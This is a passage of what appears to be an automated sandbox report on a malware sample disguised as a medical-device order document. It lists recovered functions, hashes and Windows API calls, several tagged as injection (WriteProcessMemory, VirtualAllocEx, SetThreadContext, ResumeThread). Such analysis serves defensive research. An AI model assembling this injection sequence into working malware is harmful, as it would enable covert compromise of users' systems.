                                                                                                  Function 055744B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 833 55744b0-55759d9 CreateActCtxA 836 55759e2-5575a3c 833->836 837 55759db-55759e1 833->837 844 5575a3e-5575a41 836->844 845 5575a4b-5575a4f 836->845 837->836 844->845 846 5575a51-5575a5d 845->846 847 5575a60 845->847 846->847 848 5575a61 847->848 848->848
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 055759C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 25bcdb7b94c1e86844dd6fd06e941395a8091588f972c7a8035363fb20fb201c
                                                                                                  • Instruction ID: caacda855d4fb05a717d71e7f739874368cdeb8aebd85018e6152dc803999dbd
                                                                                                  • Opcode Fuzzy Hash: 25bcdb7b94c1e86844dd6fd06e941395a8091588f972c7a8035363fb20fb201c
                                                                                                  • Instruction Fuzzy Hash: F841C071C0071DCBEB24DFA9C884B9DBBF5BF48304F20806AD409AB251DB756945CF94
                                                                                                  Function 07B22E50 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 850 7b22e50-7b22e75 call 7b208ec 853 7b22e77-7b22e87 850->853 854 7b22e8a-7b22f1c CreateIconFromResourceEx 850->854 857 7b22f25-7b22f42 854->857 858 7b22f1e-7b22f24 854->858 858->857
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1331090408.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7b20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: d48dec63c0a5f294485fa81fd5757eebbe71ea6ca4f6496b54e5eb8b03e06382
                                                                                                  • Instruction ID: af3435ea00961ee4f3e85f8286825bbfcbd732c262b2d9e489450a7aa029a3f8
                                                                                                  • Opcode Fuzzy Hash: d48dec63c0a5f294485fa81fd5757eebbe71ea6ca4f6496b54e5eb8b03e06382
                                                                                                  • Instruction Fuzzy Hash: BB319EB29003599FDB12DFA9C804ADEBFF5EF08310F14805AE554E7261C3359851DFA1
                                                                                                  Function 076D6819 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 861 76d6819-76d686e 863 76d687e-76d68bd WriteProcessMemory 861->863 864 76d6870-76d687c 861->864 866 76d68bf-76d68c5 863->866 867 76d68c6-76d68f6 863->867 864->863 866->867
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 076D68B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 54944ee9cf3f6f402fa642bbc8d4d037bb0197bfbf71e73fcf9eb2508d064090
                                                                                                  • Instruction ID: 33dc4464066566a52b7e19c3a60820d0ff36d7afbf2d6b6e70c4fecc861997af
                                                                                                  • Opcode Fuzzy Hash: 54944ee9cf3f6f402fa642bbc8d4d037bb0197bfbf71e73fcf9eb2508d064090
                                                                                                  • Instruction Fuzzy Hash: F92124B2D10319DFDB10CFA9C880BEEBBF5BF48310F10842AE919A7250C7789954CBA5
                                                                                                  Function 076D6820 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 871 76d6820-76d686e 873 76d687e-76d68bd WriteProcessMemory 871->873 874 76d6870-76d687c 871->874 876 76d68bf-76d68c5 873->876 877 76d68c6-76d68f6 873->877 874->873 876->877
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 076D68B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: b9a70805b45e2d51f09c38194b26019e9764bfc79126e348cce7d137c400f289
                                                                                                  • Instruction ID: d4908dcdfa231a89504930b090e4f582d3fbda723e4d608077ee51d50324bd7b
                                                                                                  • Opcode Fuzzy Hash: b9a70805b45e2d51f09c38194b26019e9764bfc79126e348cce7d137c400f289
                                                                                                  • Instruction Fuzzy Hash: DE2115B1D103199FDB10CFAAC884BEEBBF5BF48310F10842AE919A7240C7789954CBA5
                                                                                                  Function 076D6248 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 881 76d6248-76d629b 883 76d629d-76d62a9 881->883 884 76d62ab-76d62db Wow64SetThreadContext 881->884 883->884 886 76d62dd-76d62e3 884->886 887 76d62e4-76d6314 884->887 886->887
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D62CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 467b9e8a0f59a7ea19c5f3698d40e9359f0109dc842c39b671b4df253b5b5804
                                                                                                  • Instruction ID: 56d615eca7412c69088d1bd3e74442631fea76600429d2d93296167582b403e3
                                                                                                  • Opcode Fuzzy Hash: 467b9e8a0f59a7ea19c5f3698d40e9359f0109dc842c39b671b4df253b5b5804
                                                                                                  • Instruction Fuzzy Hash: EB2159B1D103098FDB14CFAAC881BEEBBF4AF88314F14842ED419A7241D7789945CFA5
                                                                                                  Function 0557B0B4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0557D66E,?,?,?,?,?), ref: 0557D72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 82da0925b51bd4b509a895f32c90d33f626334fdc91fd14ece7d6a17044a3f32
                                                                                                  • Instruction ID: 4e77b351af62b80641b9bc0ae5edab0e24b3fa24004b46d91eb5396fed88711c
                                                                                                  • Opcode Fuzzy Hash: 82da0925b51bd4b509a895f32c90d33f626334fdc91fd14ece7d6a17044a3f32
                                                                                                  • Instruction Fuzzy Hash: C121D4B59002489FDB10CF9AD484AEEBBF5FB48310F14841AE915A7350D379A954CFA5
                                                                                                  Function 076D6909 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 076D6990
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: 2ef0d04f6b6d2f9891f5fa406ee92e42dbed821a944a7aa1ea6813642689c108
                                                                                                  • Instruction ID: 5cd9889e2aa8028e77fa1175386998a34a21423b69724d281695f0bbde147f8c
                                                                                                  • Opcode Fuzzy Hash: 2ef0d04f6b6d2f9891f5fa406ee92e42dbed821a944a7aa1ea6813642689c108
                                                                                                  • Instruction Fuzzy Hash: 332136B1C003199FDB10CFAAC880BEEBBF5FF48310F10842AE519A7250C7789910CB65
                                                                                                  Function 076D6250 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D62CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 41e2fb77c752b261800a085bc0c7c7b5d61b941bf213c8c70bb2971b882d520a
                                                                                                  • Instruction ID: c49ea9db0765241e00f3ce7bb2b71bffc041c5798419057fcf59e7d42ce285c2
                                                                                                  • Opcode Fuzzy Hash: 41e2fb77c752b261800a085bc0c7c7b5d61b941bf213c8c70bb2971b882d520a
                                                                                                  • Instruction Fuzzy Hash: 5F2138B1D103098FDB14DFAAC484BEEBBF4AF88314F14842AD459A7240DB789944CFA5
                                                                                                  Function 076D6910 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 076D6990
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: dfd6877203a3c2f0f96a8d35d7c7e30b0124d8dc3a79c758d76bed3085c7e7f8
                                                                                                  • Instruction ID: 1b43926f14df6eddc9e1ef77518cd3814f0565bedd8f5d7ccbf022632e03ed6d
                                                                                                  • Opcode Fuzzy Hash: dfd6877203a3c2f0f96a8d35d7c7e30b0124d8dc3a79c758d76bed3085c7e7f8
                                                                                                  • Instruction Fuzzy Hash: 322128B1C003599FDB10DFAAC840BEEBBF5FF48310F10842AE959A7240C7799940CBA5
                                                                                                  Function 0557D6A1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0557D66E,?,?,?,?,?), ref: 0557D72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 93bb8d9818937647847356ed6740519de0b7c7648757de765af4d976d2209634
                                                                                                  • Instruction ID: e8820b53b74ecca7f6af752e31ce746371e0a1531f0ab94fb177db489a109e2c
                                                                                                  • Opcode Fuzzy Hash: 93bb8d9818937647847356ed6740519de0b7c7648757de765af4d976d2209634
                                                                                                  • Instruction Fuzzy Hash: 5821E3B5D002489FDB10CFA9D584AEEBBF4FB48310F14841AE914A3350D378A954CF65
                                                                                                  Function 07B208EC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07B22E6A,?,?,?,?,?), ref: 07B22F0F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1331090408.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7b20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: ecbb3dc5169615f8161f1d601c61f404fde137bf6830efdea2b7b10c68da8518
                                                                                                  • Instruction ID: 65bde3c5bde71ecc26927761affec68450d23f28edb80c4874fa8c8e9bebe0f1
                                                                                                  • Opcode Fuzzy Hash: ecbb3dc5169615f8161f1d601c61f404fde137bf6830efdea2b7b10c68da8518
                                                                                                  • Instruction Fuzzy Hash: D21129B680025D9FEB10DF9AC844BDEBFF8EB48310F14845AE918A7250C375A954DFA5
                                                                                                  Function 076D6758 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 076D67CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 53ba2182f7aa7c95644df6326aefc650b875bb8204d323d591ce16862533b2e9
                                                                                                  • Instruction ID: 1d112570c21c045d7b67e24bbb3e145bcad309ad4e16ff54683dae3a0e7a76bb
                                                                                                  • Opcode Fuzzy Hash: 53ba2182f7aa7c95644df6326aefc650b875bb8204d323d591ce16862533b2e9
                                                                                                  • Instruction Fuzzy Hash: 4D114772D00209DFDB10DFAAC844BEEBBF5AF88310F14881AE515A7250C7759944CFA5
                                                                                                  Function 076D6760 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 076D67CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 92e18b8faa215fcbdeafbca3f7a511724a295b0997607b78f18c3a1969c7866f
                                                                                                  • Instruction ID: 1e2aa5bfde9681f3860e201e82360730a72252f4b0441ca99556923fc1f8bce8
                                                                                                  • Opcode Fuzzy Hash: 92e18b8faa215fcbdeafbca3f7a511724a295b0997607b78f18c3a1969c7866f
                                                                                                  • Instruction Fuzzy Hash: 64115672C003099FDB20DFAAC844BDFBBF5AF88310F10881AE515A7250C775A940CFA5
                                                                                                  Function 076D6199 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 651bf45f677e52a02b136526f16510ed45d22858c3dd8a717be8890944171db4
                                                                                                  • Instruction ID: 38e7a90f9b6a4036c5ebf394714a0fbd62138d5bc8fb3a863db895bb1e6f6fbf
                                                                                                  • Opcode Fuzzy Hash: 651bf45f677e52a02b136526f16510ed45d22858c3dd8a717be8890944171db4
                                                                                                  • Instruction Fuzzy Hash: B5115BB1D103498FDB24DFAAC4457EEFBF5AF88314F24841AD415A7240C7799940CFA5
                                                                                                  Function 076D61A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 7354e69212036f11c3711e6dd4ee5f5f3f81d90e830811c0c331a22cc9aef4fa
                                                                                                  • Instruction ID: 60e15f20980f9e28a49f3521fbb012d82e46b452ae57ca3066c16cbe4df0c996
                                                                                                  • Opcode Fuzzy Hash: 7354e69212036f11c3711e6dd4ee5f5f3f81d90e830811c0c331a22cc9aef4fa
                                                                                                  • Instruction Fuzzy Hash: 12113AB1D003488FDB24DFAAC4447DFFBF5AF88314F14841AD419A7240CB79A944CBA5
                                                                                                  Function 076D9829 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076D988D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 0fea3812c92494538929819a462e811180580ce89bb9a7a53ce8bc593ae6a7a6
                                                                                                  • Instruction ID: 6d4fee080247557e9c92e7366ca23de38e0c91388d6d10ca101354b67e4a83b4
                                                                                                  • Opcode Fuzzy Hash: 0fea3812c92494538929819a462e811180580ce89bb9a7a53ce8bc593ae6a7a6
                                                                                                  • Instruction Fuzzy Hash: E21106B5C003499FDB20DF9AD845BDEBBF8FB48710F10841AE559A7240C375A944CFA5
                                                                                                  Function 0557B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0557B41E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: d58d02f95f7ddcf708d129060b58fabc5ffab3b5631999b915bbd6b4598ca1bd
                                                                                                  • Instruction ID: 5e178bc777414a444f3a3f7d33a2907e54fa1bed7a0e2472f8f2234befeba50a
                                                                                                  • Opcode Fuzzy Hash: d58d02f95f7ddcf708d129060b58fabc5ffab3b5631999b915bbd6b4598ca1bd
                                                                                                  • Instruction Fuzzy Hash: 7011E0B6C002498FDB20CF9AD844BDEFBF5BB88324F14841AD819A7710D379A545CFA5
                                                                                                  Function 076D3508 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076D988D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 7548928ab0499ac7ec26b07c380176dd8c9eba7001794fd620f6b763c307a654
                                                                                                  • Instruction ID: 3f15023bb22d8dd199b86fbec05c7190a0448760b289e4584f87ad87ada09772
                                                                                                  • Opcode Fuzzy Hash: 7548928ab0499ac7ec26b07c380176dd8c9eba7001794fd620f6b763c307a654
                                                                                                  • Instruction Fuzzy Hash: 6211F5B5C103499FDB10DF9AD884BDEBBF8EB48310F10841AE919A7240C375A944CFA5
                                                                                                  Function 016DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325500450.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 868eff02c1a7cb5e0cb45c8692b5525cfcb5144951de2cb992fcb4b7c24f9ea4
                                                                                                  • Instruction ID: c62c33799859797cad59ee5840fcf55701bf8383d14b18e2946d329e9b882040
                                                                                                  • Opcode Fuzzy Hash: 868eff02c1a7cb5e0cb45c8692b5525cfcb5144951de2cb992fcb4b7c24f9ea4
                                                                                                  • Instruction Fuzzy Hash: 2321D071A04200EFDB25EF64D984B16BBA5EBC8314F24C56DE90A4B396C336D447CAA2
                                                                                                  Function 016DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325500450.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a1f9285ce02f20d99f7b213c3d3bf8381a5521a3d2bb084b006fb9fa32029bd
                                                                                                  • Instruction ID: d68a671eaefdd8c6b20c7b2811c20e93091c1b7652783587d68cc564bfbf82dc
                                                                                                  • Opcode Fuzzy Hash: 5a1f9285ce02f20d99f7b213c3d3bf8381a5521a3d2bb084b006fb9fa32029bd
                                                                                                  • Instruction Fuzzy Hash: AB21B071904204AFDB15EFA4D9C0B26BBA5FB84324F24C56DEA4A4B396C336D446CA61
                                                                                                  Function 016DD005 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325500450.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bfb0c09c69c9159a385ccb64e6038d2bfaba0e492736a56da189d8e678f81e9d
                                                                                                  • Instruction ID: b940ab4ac0ef76440d4a5103d5dc609f5176b6a8cc751d9a86715ff295cd12b4
                                                                                                  • Opcode Fuzzy Hash: bfb0c09c69c9159a385ccb64e6038d2bfaba0e492736a56da189d8e678f81e9d
                                                                                                  • Instruction Fuzzy Hash: 672180755083809FCB12DF64D994711BF71EB86214F28C5EAD8498F6A7C33A9806CB62
                                                                                                  Function 016DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325500450.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                  • Instruction ID: 32a17890ee05a7c4805d25e0cc6da1b7b8f88ea8277f34ed956d3812133cd153
                                                                                                  • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                  • Instruction Fuzzy Hash: 1511BB75904280DFCB12DF54D9C4B15BBB1FB84324F24C6A9D9494B796C33AD40ACB61
                                                                                                  Function 016CD745 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325433446.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16cd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6ea14f45f73751d30c23fc8123a506b5dc1f10a01b08617f430e70041791e7a2
                                                                                                  • Instruction ID: 6689cde14443f3fad980b0a53765231b3e8077485c72b79d53d5780ebc3e74fd
                                                                                                  • Opcode Fuzzy Hash: 6ea14f45f73751d30c23fc8123a506b5dc1f10a01b08617f430e70041791e7a2
                                                                                                  • Instruction Fuzzy Hash: 19018471404380AAE7205A65CD84B76BB98DF41A64F14852EED094B286D3799441CAF6
                                                                                                  Function 016CD744 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1325433446.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
